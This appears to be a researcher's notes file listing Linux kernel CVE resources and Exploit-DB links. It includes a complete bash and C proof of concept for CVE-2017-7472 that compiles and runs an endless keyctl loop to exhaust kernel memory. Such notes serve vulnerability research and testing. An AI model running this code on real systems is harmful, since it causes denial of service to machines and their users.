

[Common Vulnerabilities and Exposures](https://cve.mitre.org/index.html)

[debian securiry bug tracker](https://security-tracker.debian.org/tracker/)

[Exploits db](https://www.exploit-db.com/)

[cve details](https://www.cvedetails.com/product/47/Linux-Linux-Kernel.html?vendor_id=33)

[NIST search](https://nvd.nist.gov/vuln/search)

[RH bugzilla](https://bugzilla.redhat.com/)

[oops](http://opensourceforu.com/2011/01/understanding-a-kernel-oops/)
-----------------

### CVE-2017-7472

The KEYS subsystem in the Linux kernel before 4.10.13 allows local users to cause a denial of service (memory consumption) via a series of KEY_REQKEY_DEFL_THREAD_KEYRING keyctl_set_reqkey_keyring calls. 

[cve](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7472)
[exploit](https://www.exploit-db.com/exploits/42136/)

```bash
yum install keyutils-libs-devel
cat > keyctlcve.c<<EOF
#include <linux/keyctl.h>
int main()
{
    for (;;)
        keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING);
}
EOF
gcc -O2 -o k ./keyctlcve.c -lkeyutils
./k
```
-----------------
### CVE-2017-7541 brcmfmac: fix possible buffer overflow in brcmf_cfg80211_mgmt_tx()

[sec. tracker](http://www.securitytracker.com/id/1038981)
[fix](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8f44c9a41386729fea410e688959ddaa9d51be7c)

-----------------
[remote CVE-2017-5972](https://www.exploit-db.com/exploits/41350/)
[crash by usb dev CVE-2016-2184](https://www.exploit-db.com/exploits/39555/)
[panic by splice](https://www.exploit-db.com/exploits/36743/)
[bpf](https://www.exploit-db.com/exploits/42048/)
[race in perf_event_open](https://www.exploit-db.com/exploits/39771/)
[local root exploit for CVE-2017-7308](https://www.exploit-db.com/exploits/41994/)

-----------------
Is it in git???
[dccp double free](https://www.exploit-db.com/exploits/41457/)
[-](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6074)
[-](http://www.opennet.ru/opennews/art.shtml?num=46084)
[oss sec list](http://seclists.org/oss-sec/2017/q1/471)

------------
[expand_downwards](https://groups.google.com/forum/#!msg/syzkaller/SaJgfpbKTlg/kSdMBKWPBQAJ)

